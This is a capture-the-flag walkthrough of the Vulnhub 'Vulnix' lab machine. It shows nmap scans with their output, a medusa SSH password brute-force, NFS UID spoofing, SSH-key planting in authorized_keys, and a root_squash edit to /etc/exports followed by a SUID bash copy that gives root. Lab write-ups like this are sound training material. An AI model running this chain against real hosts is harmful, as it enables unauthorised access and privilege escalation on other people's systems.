Today we are working on the Vulnix machine from Vulnhub.
Lets find the IP first.
nmap -sN 192.168.18.92/24
We got the IP, 192.168.18.93
Lets do a detailed scan now.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-12 04:47 EDT
Nmap scan report for 192.168.18.93
Host is up (0.0050s latency).
Not shown: 65518 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp Postfix smtpd
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
|
|_sslv2-drown:
79/tcp open finger Linux fingerd
|
110/tcp open pop3 Dovecot pop3d
|_
|
|_sslv2-drown:
111/tcp open rpcbind 2-4 (RPC #100000)
|
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 33365/udp6 mountd
| 100005 1,2,3 47947/tcp6 mountd
| 100005 1,2,3 56458/udp mountd
| 100005 1,2,3 57756/tcp mountd
| 100021 1,3,4 39547/udp nlockmgr
| 100021 1,3,4 47952/tcp6 nlockmgr
| 100021 1,3,4 53508/udp6 nlockmgr
| 100021 1,3,4 53795/tcp nlockmgr
| 100024 1 38357/udp status
| 100024 1 39369/tcp status
| 100024 1 48082/udp6 status
| 100024 1 57952/tcp6 status
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
143/tcp open imap Dovecot imapd
|_
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
|
993/tcp open ssl/imaps?
|_
995/tcp open ssl/pop3s?
2049/tcp open nfs_acl 2-3 (RPC #100227)
39369/tcp open status 1 (RPC #100024)
42985/tcp open mountd 1-3 (RPC #100005)
48267/tcp open mountd 1-3 (RPC #100005)
53795/tcp open nlockmgr 1-4 (RPC #100021)
57756/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:67:74:42 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 4.97 ms 192.168.18.93
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.55 seconds
finger is running on port 79. Lets do some user enumeration first.
We got a few users.
Lets try bruteforcing the logins.
make a text file with usernames.
Lets run medusa with rockyou.txt
medusa -h 192.168.18.93 -U vulnix_users.txt -P rockyou.txt -e ns -f -M ssh > medusa.txt
Let’s try to enumerate further when the brute forcing is going on in the background.
From the detailed scan above, we can see thet NFS is running on port 2049. Lets go deeper.
nmap -sV --script=nfs-* 192.168.18.93
We have an NFS share at /home/vulnix
. Lets try to mont it to our machine.
But, we dont have permission to open it.
Lets go back to our medusa and check the results.
So, the password for user
is letmein
.
Lets try to login to the machine.
Lets now check the /etc/passwd
file and get details for vulnix user.
If we add this user to our system with same uid as 2008, we can read the mounted directory. Right? Lets try.
useradd -u 2008 vulnix
su vulnix
cd /tmp/vulnix
ls -la
We got access to vulnix’s home folder.
If we place our id_rsa.pub key in /mnt/vulnix/.ssh/authorized_keys
we can login without passsword.
Create a key, if you have not created yet.
ssh-keygen -t rsa
Now add the public key to /tmp
. and change the owner to vulnix.
add the file to /mnt/vulnix/.ssh/authorized_keys
Now we can login as vulnix on the target machine without password.
Lets see what can we do with this user.
sudo -l
We can edit the /etc/exports
file as root without password.
According to this article, https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ , the *(rw,root_squash)
is used to prevent file access as root. Since we have edit acces to this file. we can change that.
Made the change and saved.
We need to restart NFS to bring our change into action, since we dont have root access, lets restart the machine.
Now remount the share and copy our /bin/bash to the mounted directory.
root@kali:/mnt/vulnix# cp /bin/bash .
The file is present in the home folder of vulnix, with owner as root. Lets try to run that.
./bash
whoami
root
So we got the root access in Vulnix too. Next day next Machine!
One Reply to “Hacklab Vulnix, Vulnhub Machine Walkthrough”
Comments are closed.